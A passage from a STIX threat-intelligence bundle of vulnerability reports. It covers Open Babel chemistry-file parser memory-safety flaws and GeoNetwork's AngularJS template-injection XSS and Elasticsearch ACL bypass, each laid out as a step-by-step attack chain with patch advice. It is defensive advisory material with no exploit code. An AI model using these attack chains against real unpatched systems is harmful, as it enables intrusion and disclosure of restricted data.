      "description": "## Overview\n\nA high-severity memory-safety vulnerability, identified as CVE-2022-43467, has been discovered in Open Babel's PQS `coord_file` parser. This flaw affects all versions up to and including 3.1.1 of the Open Babel library and CLI tool, which is critical for processing various chemistry file formats. Exploitation occurs when a victim processes a specially crafted PQS file, leading to an out-of-bounds write within the `coord_file` parsing path. This vulnerability was reported by Cisco TALOS and subsequently patched in version 3.2.0, released on 2026-05-26. Given Open Babel's widespread use across Linux distributions and in services that handle untrusted input, this flaw poses a significant risk of arbitrary code execution or denial of service.\n\n## Attack Chain\n\n1. An attacker crafts a specially designed PQS file containing a malformed `coord_file` specifier that targets the vulnerability.\n2. The attacker delivers this malicious PQS file to a target system or user, often via email, download, or integration into a workflow.\n3. A user or automated service on the victim system opens and processes the malicious PQS file using an affected Open Babel component (e.g., `obabel` CLI tool, `OBConversion` API, or language bindings).\n4. During the parsing process of the PQS `coord_file` path, the malformed specifier triggers an out-of-bounds write operation.\n5. This memory corruption overwrites adjacent memory regions, leading to unpredictable program behavior, including crashes.\n6. Successful exploitation can result in application crashes (Denial of Service) or, with further exploitation, arbitrary code execution on the compromised system.\n\n## Impact\n\nThe vulnerability affects any system or service utilizing Open Babel versions up to 3.1.1 to process PQS files, particularly those that handle untrusted or external input. Open Babel is widely deployed as a C++ library and command-line interface, integrated into Linux distributions and various scientific applications. Successful exploitation of CVE-2022-43467 can lead to service disruption through denial of service (application crashes) or, more severely, arbitrary code execution, allowing attackers to gain control over affected systems. The full scope of potential victims is broad due to the library's foundational role in chemistry informatics.\n\n## Recommendation\n\n*   Immediately update all Open Babel installations to version 3.2.0 or later to patch CVE-2022-43467.\n*   For Python environments, ensure `pip/openbabel` is updated to a version greater than or equal to 3.2.0.\n*   Implement strict input validation for all PQS files processed by Open Babel components, especially those originating from untrusted sources, to mitigate the risk of malformed file attacks.\n",
      "published": "2026-07-03T12:53:09Z",
      "labels": [
        "open-babel",
        "vulnerability",
        "memory-corruption",
        "cve",
        "library"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
        "attack-pattern--6321d9e8-1495-5cee-9dc7-66574584ff1b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-f29h-2h58-48r7"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/openbabel/openbabel/commit/2a7d2cda"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d7b653f7-1009-5c20-aead-d17e6a20aa02",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--49f18336-4690-5b91-8446-b36bec0cf249",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--49f18336-4690-5b91-8446-b36bec0cf249",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Open Babel MOL2 Parser Out-of-Bounds Write (CVE-2022-43607)",
      "description": "## Overview\n\nCisco TALOS reported a critical memory-safety vulnerability, CVE-2022-43607, affecting Open Babel versions up to 3.1.1. This flaw resides within the MOL2 file format parser, specifically in the attribute/value parsing path. An attacker can craft a malicious MOL2 file containing an overly long attribute or value, which, when processed by the vulnerable Open Babel software, triggers an out-of-bounds write. This vulnerability is significant because Open Babel is a widely used C++ library and command-line interface (`obabel`) for manipulating chemistry file formats, often embedded in scientific applications and services. The vulnerability can be exploited when a victim opens a specially crafted MOL2 file using the `obabel` tool, the `OBConversion` API, or any of its language bindings (Python, Ruby, Java, R, Perl, C#, PHP). This can lead to memory corruption, denial of service, or potentially arbitrary code execution if successfully weaponized.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious MOL2 file containing an over-long attribute or value designed to exceed a fixed-size buffer.\n2.  The attacker delivers this crafted MOL2 file to a target system or user (e.g., via email, web download, or shared storage).\n3.  The victim opens or processes the malicious MOL2 file using the `obabel` command-line tool, the `OBConversion` API, or one of Open Babel's language bindings.\n4.  Open Babel's MOL2 parser attempts to parse the malicious file's attributes and values.\n5.  During parsing, the overly long data triggers an out-of-bounds write operation past the end of an allocated memory buffer.\n6.  This memory corruption can lead to a crash of the Open Babel process, resulting in a denial of service (DoS).\n7.  With sophisticated exploitation, this memory corruption could potentially be leveraged to achieve arbitrary code execution.\n\n## Impact\n\nThe successful exploitation of CVE-2022-43607 can result in memory corruption, leading to a denial of service (DoS) by crashing the application or tool processing the malicious MOL2 file. In more severe scenarios, it could enable arbitrary code execution, granting attackers control over the compromised system. While no specific in-the-wild exploitation has been observed, the widespread use of Open Babel in academic, research, and industrial sectors that handle chemical data means that a broad range of organizations could be affected. Any service or workstation that uses Open Babel to parse untrusted MOL2 files is at risk.\n\n## Recommendation\n\n*   Patch CVE-2022-43607 by updating Open Babel to version 3.2.0 or later immediately across all affected systems.\n*   Implement process creation logging (e.g., Sysmon for Windows or Auditd for Linux) to activate the provided Sigma rule for `obabel` execution.\n*   Review and tune the provided Sigma rule to monitor for unusual invocations of the `obabel` command-line tool, especially from untrusted sources or with uncommon parameters.\n*   Educate users on the risks of opening untrusted or suspicious MOL2 files received from unknown sources, as user interaction is required for exploitation.\n",
      "published": "2026-07-03T12:52:17Z",
      "labels": [
        "memory-safety",
        "vulnerability",
        "library",
        "cve",
        "file-parsing",
        "chemistry",
        "denial-of-service",
        "code-execution"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-vjg6-gm8m-v5g6"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/openbabel/openbabel/commit/4110d59a"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3879ea44-0d8b-5497-a259-7d74213962a5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d00301bb-b263-53c2-be52-581463f75b88",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d00301bb-b263-53c2-be52-581463f75b88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Open Babel Has Uninitialized Pointer Dereference in MSI Atom Parser",
      "description": "## Overview\n\nA memory-safety vulnerability, identified as CVE-2022-44451, has been discovered in Open Babel, a widely used C++ library and command-line interface for chemistry file format manipulation. Reported by Cisco TALOS, this flaw exists within Open Babel's MSI atom parser, leading to an uninitialized pointer dereference when processing a specially crafted input file. This vulnerability affects all Open Babel versions up to and including 3.1.1. Attackers could exploit this by convincing a victim to open a malicious MSI file using the `obabel` CLI tool, the `OBConversion` API, or any of its language bindings (Python, Ruby, Java, R, Perl, C#, PHP). This could lead to application instability, crashes, or denial of service on systems that parse untrusted chemical file formats, impacting scientific computing environments and services embedding the library.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious MSI (Molecular Structure Input) file specifically designed to trigger the uninitialized pointer dereference vulnerability (CVE-2022-44451) within Open Babel's parser.\n2.  The attacker delivers this malicious MSI file to a target system or user, potentially through phishing emails, malicious websites, or embedding it within a seemingly legitimate data set.\n3.  The victim opens or attempts to process the malicious MSI file using the `obabel` command-line tool, an application leveraging the `OBConversion` API, or any of Open Babel's language bindings (e.g., Python, Ruby).\n4.  Open Babel's internal MSI parser begins to process the malformed record within the crafted input file.\n5.  During atom handling, the parser attempts to dereference an atom pointer that has not been properly initialized, triggering the memory-safety flaw.\n6.  This uninitialized pointer dereference causes the Open Babel application or the service embedding it to crash or become unstable.\n7.  The final objective is application denial of service or potential arbitrary code execution, impacting the availability and integrity of the affected system.\n\n## Impact\n\nThis vulnerability primarily results in application instability or denial of service, as the affected Open Babel process crashes when attempting to parse a malicious MSI file. Given Open Babel's role as a core library and CLI tool shipped by various Linux distributions and embedded in services that process chemical file formats, a successful attack could disrupt scientific computing workflows, research data processing, or any service relying on Open Babel for untrusted input parsing. While no specific victim counts are available, the broad usage of Open Babel implies a significant potential attack surface across academic, research, and industrial sectors utilizing computational chemistry.\n\n## Recommendation\n\n*   Immediately update Open Babel installations to version 3.2.0 or newer to mitigate CVE-2022-44451, as indicated by the `Patched version` details.\n*   Implement robust input validation and sanitization for all MSI files processed by applications leveraging Open Babel, especially when dealing with untrusted sources, to prevent malformed records from reaching the vulnerable parser.\n*   Monitor for unexpected crashes or abnormal termination of the `obabel` CLI tool or any applications using the `OBConversion` API when processing MSI files, as this could indicate an attempted exploitation of CVE-2022-44451.\n",
      "published": "2026-07-03T12:51:24Z",
      "labels": [
        "chemistry",
        "vulnerability",
        "memory-safety",
        "open-babel",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-jr2x-6qf6-q5mc"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/openbabel/openbabel/commit/fa9a2d9a"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--91144e33-4bf1-5008-b8ff-dc7fc9fffe07",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Open Babel PQS Parser Uninitialized Pointer Dereference (CVE-2022-46280)",
      "description": "## Overview\n\nA significant memory-safety vulnerability, tracked as CVE-2022-46280, has been identified in the Open Babel library, specifically within its PQS parser. This flaw affects all versions up to and including 3.1.1. The vulnerability stems from improper handling of `pFormat` during PQS file parsing, where a malformed input file can cause the parser to dereference an uninitialized pointer. This can lead to application instability, crashes, and potentially denial of service when untrusted PQS files are processed. Open Babel is a widely used C++ chemistry library and command-line tool, often embedded in other services or shipped with Linux distributions, making its exploitation a concern for systems that process untrusted chemical file formats. The vulnerability was responsibly disclosed by Cisco TALOS.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious PQS (Protein Query System) input file specifically designed to exploit the uninitialized pointer dereference vulnerability.\n2.  The attacker delivers this malicious PQS file to a victim system through various means, such as email attachments, malicious websites, or shared network drives.\n3.  The victim user or an automated service is induced to open or process the malicious PQS file using the `obabel` command-line tool, the `OBConversion` API, or any language binding (e.g., Python, Ruby, Java, R, Perl, C#, PHP) that utilizes the vulnerable Open Babel library.\n4.  During the parsing of the malformed PQS file, the Open Babel library attempts to access a `pFormat` pointer that has not been correctly initialized.\n5.  This uninitialized pointer dereference triggers a memory access violation or segmentation fault within the application using Open Babel.\n6.  The application crashes, leading to a denial of service (DoS) for the affected process or system, depending on how Open Babel is integrated.\n\n## Impact\n\nThe primary impact of CVE-2022-46280 is a denial of service (DoS) for applications or systems that utilize the vulnerable Open Babel library to parse untrusted PQS files. If a malicious PQS file is processed, the application will crash, rendering it temporarily or permanently unavailable until manually restarted or if the system's fault tolerance mechanisms kick in. Given Open Babel's widespread use in scientific computing, chemistry, and various Linux distributions, this vulnerability could affect a broad range of services or end-user workstations that handle chemical data. While not directly leading to arbitrary code execution, repeated crashes could disrupt research workflows, automated processing pipelines, or critical scientific infrastructure.\n\n## Recommendation\n\n*   **Patch CVE-2022-46280 immediately** by upgrading Open Babel to version 3.2.0 or newer. Refer to https://github.com/advisories/GHSA-8qxc-57hf-hc9j for details.\n*   Implement strict input validation and sanitization for all PQS files processed by applications utilizing Open Babel, particularly those obtained from untrusted sources.\n*   Segregate critical services that process PQS files into isolated environments to limit the blast radius of potential crashes.\n*   Ensure that all instances of the `obabel` tool and any applications leveraging the Open Babel library are updated to the patched version.\n",
      "published": "2026-07-03T12:50:29Z",
      "labels": [
        "vulnerability",
        "memory-corruption",
        "library",
        "linux",
        "DoS"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-8qxc-57hf-hc9j"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/openbabel/openbabel/commit/2a7d2cda"
        },
        {
          "source_name": "reference",
          "url": "CVE-2022-46280"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c808b38c-89fa-5c2f-a3db-bba070586a31",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--75bb0c16-c4cd-51b4-acf5-ce196ba5d324",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c2a43dcd-99e9-55e9-963c-2cb6fa8ce491",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--75bb0c16-c4cd-51b4-acf5-ce196ba5d324",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Impairment",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b9bc2e88-4665-5ced-9d85-a520ecd6490a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--75bb0c16-c4cd-51b4-acf5-ce196ba5d324",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--75bb0c16-c4cd-51b4-acf5-ce196ba5d324",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Open Babel MOPAC Parser Out-of-Bounds Write Vulnerability (CVE-2022-46294)",
      "description": "## Overview\n\nOpen Babel, a C++ library and command-line tool for chemistry file format manipulation, is affected by CVE-2022-46294, a high-severity memory-safety vulnerability. Discovered and reported by Cisco TALOS, this flaw exists in the MOPAC IN reader component. Specifically, a crafted MOPAC input file containing more than three 'Tv' (translation-vector) atoms can lead to an out-of-bounds write in the `translationVectors[]` array. This vulnerability affects all Open Babel versions up to and including 3.1.1. Exploitation requires a victim to open such a malicious file using the `obabel` CLI tool, the `OBConversion` API, or any of its language bindings (Python, Ruby, Java, R, Perl, C#, PHP). The library is widely adopted, shipped by various Linux distributions, and often embedded in services that process chemical data, making it a critical concern for defenders. The vulnerability was patched in version 3.2.0, released on 2026-05-26, with the fix available in commit `40e85213`.\n\n## Attack Chain\n\n1.  Attacker crafts a malicious MOPAC input file containing more than three 'Tv' (translation-vector) atoms specifically designed to trigger an out-of-bounds write vulnerability (CVE-2022-46294).\n2.  Attacker delivers the malicious MOPAC file to a target system or user, potentially via email attachments, malicious websites, or untrusted file shares.\n3.  A user or automated process on the target system opens or attempts to process the malicious MOPAC file using the `obabel` command-line tool, the `OBConversion` API, or any of Open Babel's language bindings (e.g., Python `pybel`).\n4.  Open Babel's MOPAC IN reader component attempts to parse the malformed input file, specifically the section containing the 'Tv' atoms.\n5.  During parsing, the reader attempts to store more translation vectors than the fixed-size `translationVectors[]` array can hold, resulting in an out-of-bounds write operation past the allocated memory.\n6.  This out-of-bounds write corrupts adjacent memory, potentially leading to application crash, denial of service, or, under specific conditions, arbitrary code execution.\n7.  If arbitrary code execution is successfully achieved, the attacker gains control over the compromised process running Open Babel, which can be leveraged for further system compromise, data exfiltration, or installation of additional malware.\n\n## Impact\n\nThe successful exploitation of CVE-2022-46294 can lead to memory corruption, causing the application using Open Babel to crash, resulting in a denial of service. In more severe scenarios, it could enable arbitrary code execution within the context of the affected application, allowing an attacker to compromise the system. Open Babel is a foundational library in chemistry and materials science, widely shipped by Linux distributions and integrated into various services for processing untrusted chemical data. Organizations that parse untrusted MOPAC files using vulnerable versions of Open Babel are at risk of system instability, data breaches, or complete system takeover if arbitrary code execution is achieved.\n\n## Recommendation\n\n*   Patch CVE-2022-46294 immediately by upgrading all affected installations of Open Babel to version 3.2.0 or higher.\n",
      "published": "2026-07-03T12:47:53Z",
      "labels": [
        "memory-corruption",
        "out-of-bounds-write",
        "cve",
        "library-vulnerability"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-mjmg-352j-f456"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/openbabel/openbabel/commit/40e85213"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-46294"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--811f52f0-5e4b-579b-9c83-142da0c5a6de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--601c6026-e822-5443-8e05-8dc711f22f70",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3370770d-8f84-5471-8e9c-e2235de2665e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--601c6026-e822-5443-8e05-8dc711f22f70",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--355d18fd-da75-58a5-9a7a-0048db8c6253",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--601c6026-e822-5443-8e05-8dc711f22f70",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal Web Session Cookie",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1539",
          "url": "https://attack.mitre.org/techniques/T1539"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bb33dfac-2f9c-5dea-ac53-32184d905de9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--601c6026-e822-5443-8e05-8dc711f22f70",
      "target_ref": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--601c6026-e822-5443-8e05-8dc711f22f70",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "GeoNetwork Reflected XSS through Client-Side Template Injection (CVE-2026-39379)",
      "description": "## Overview\n\nA critical reflected Cross-Site Scripting (XSS) vulnerability, tracked as CVE-2026-39379, has been identified in GeoNetwork, an open-source geospatial metadata catalog. This flaw stems from improper neutralization of user-controlled input in error pages, which are built using AngularJS. When a user requests a non-existent or unauthorized service URL, GeoNetwork reflects parts of the original request directly into the error page without adequate sanitization. Since this page is an AngularJS application, an attacker can embed client-side template expressions (e.g., `{{...}}`) within the malicious URL. Upon rendering in the victim's browser, these expressions are evaluated, leading to the execution of arbitrary JavaScript. This vulnerability affects GeoNetwork versions 3.0.0 through 3.12.12, 4.0.0-alpha.1 through 4.0.6, 4.2.0 through 4.2.14, and 4.4.0 through 4.4.9. GeoNetwork 3.x and 4.0.x lines are no longer maintained and will not receive patches.\n\n## Attack Chain\n\n1.  **Craft Malicious URL**: The attacker crafts a specific URL that targets a non-existent or unauthorized GeoNetwork service endpoint, embedding client-side template injection payloads (e.g., `{{expression}}`) within the path or query parameters.\n2.  **Phishing Delivery**: The attacker delivers this crafted malicious URL to a victim, typically via social engineering tactics such as phishing emails, instant messages, or compromised web pages, enticing the victim to click the link.\n3.  **Victim Request**: The victim, interacting with the lure, clicks the malicious URL, causing their web browser to send an HTTP GET request containing the embedded payload to the vulnerable GeoNetwork server.\n4.  **Server Error Response**: The GeoNetwork server processes the request for the invalid service. Due to its design, it generates an AngularJS-based error page that reflects portions of the original, unsanitized request URL back to the client.\n5.  **Client-Side Template Evaluation**: When the victim's browser receives and renders the error page, the AngularJS framework identifies the reflected attacker-controlled content as a template expression. It then evaluates this expression.\n6.  **Arbitrary JavaScript Execution**: The evaluation of the template expression results in the execution of the attacker's arbitrary JavaScript code within the context of the victim's browser.\n7.  **Impact on Authenticated Session**: The malicious JavaScript executes with the same permissions and within the same authenticated session as the victim user, potentially allowing for session hijacking, data exfiltration from GeoNetwork, or performing unauthorized actions on the victim's behalf.\n8.  **Further Exploitation**: The attacker leverages the executed JavaScript to achieve their objective, which could include redirecting the user to a fake login page for credential harvesting or initiating further attacks against the GeoNetwork instance.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-39379 allows an attacker to execute arbitrary JavaScript code within the victim's browser. This code runs in the context of the victim's authenticated session, enabling severe consequences such as session hijacking, unauthorized data exfiltration from the GeoNetwork instance, or performing actions on the victim's behalf, including modifying content or changing configurations if the victim is an administrator. Additionally, attackers could inject fake login forms or malicious content to harvest credentials or spread malware. GeoNetwork versions 3.x and 4.0.x are particularly at risk as they are archived and will not receive official fixes, necessitating immediate upgrades for affected organizations.\n\n## Recommendation\n\n*   Patch CVE-2026-39379 immediately by upgrading GeoNetwork to a fixed version (4.2.15 or later, or 4.4.10 or later).\n*   Deploy the Sigma rule \"Detects CVE-2026-39379 Exploitation - GeoNetwork Reflected XSS Attempt\" to your SIEM to identify attempts at client-side template injection via web server logs.\n",
      "published": "2026-07-03T12:45:55Z",
      "labels": [
        "xss",
        "web-vulnerability",
        "client-side-injection",
        "angularjs",
        "ghsa",
        "webserver"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-2v4m-fw6c-g78f"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1c1e279a-ac23-555d-bec3-6a71ee51400b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4af98657-8c39-55af-80b6-27d210e4970e",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f2ba017c-4779-5e72-be36-f3e3d27e63ec",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4af98657-8c39-55af-80b6-27d210e4970e",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7e993dbc-2861-582e-a84e-2e347635cb62",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4af98657-8c39-55af-80b6-27d210e4970e",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4af98657-8c39-55af-80b6-27d210e4970e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "GeoNetwork ACL Bypass in Elasticsearch Search (CVE-2026-46487)",
      "description": "## Overview\n\nA significant authorization bypass vulnerability (CVE-2026-46487) has been identified in GeoNetwork's search API, affecting all public-facing GeoNetwork 4.x instances from version 4.0.0-alpha.1 through 4.4.10. This flaw lies within the search proxy layer, which is designed to inject access-control and visibility filters into every request before it reaches the underlying Elasticsearch index. However, under specific conditions where the client-supplied search request intentionally omits the 'query' field, this critical filtering step is skipped. As a result, an unauthenticated attacker can retrieve indexed metadata records that should be restricted, including group-specific data, draft records, and information requiring ownership checks, leading to significant information disclosure.\n\n## Attack Chain\n\n1.  An unauthenticated attacker sends a crafted HTTP POST request to a public-facing GeoNetwork instance's Elasticsearch-backed search API endpoint.\n2.  The attacker constructs a malformed JSON request body for the Elasticsearch search, intentionally omitting the `query` field, while potentially including other search parameters.\n3.  The GeoNetwork search proxy layer, responsible for injecting access-control and visibility filters, fails to apply these restrictions because the `query` field is absent from the request.\n4.  The unfiltered request is forwarded to the backend Elasticsearch index without the intended authorization checks for group-based visibility, draft record exclusion, or ownership.\n5.  Elasticsearch executes the search query as received and returns all matching metadata records, irrespective of their access control settings.\n6.  The unauthenticated attacker receives the full contents of metadata records that should have been restricted, resulting in sensitive information disclosure.\n\n## Impact\n\nThis vulnerability (CWE-862: Missing Authorization) leads to unauthorized information disclosure, allowing unauthenticated attackers to access sensitive metadata records. The skipped filter step is responsible for enforcing multiple layers of access control, including group-based record visibility, exclusion of draft records, and ownership verification. Consequently, 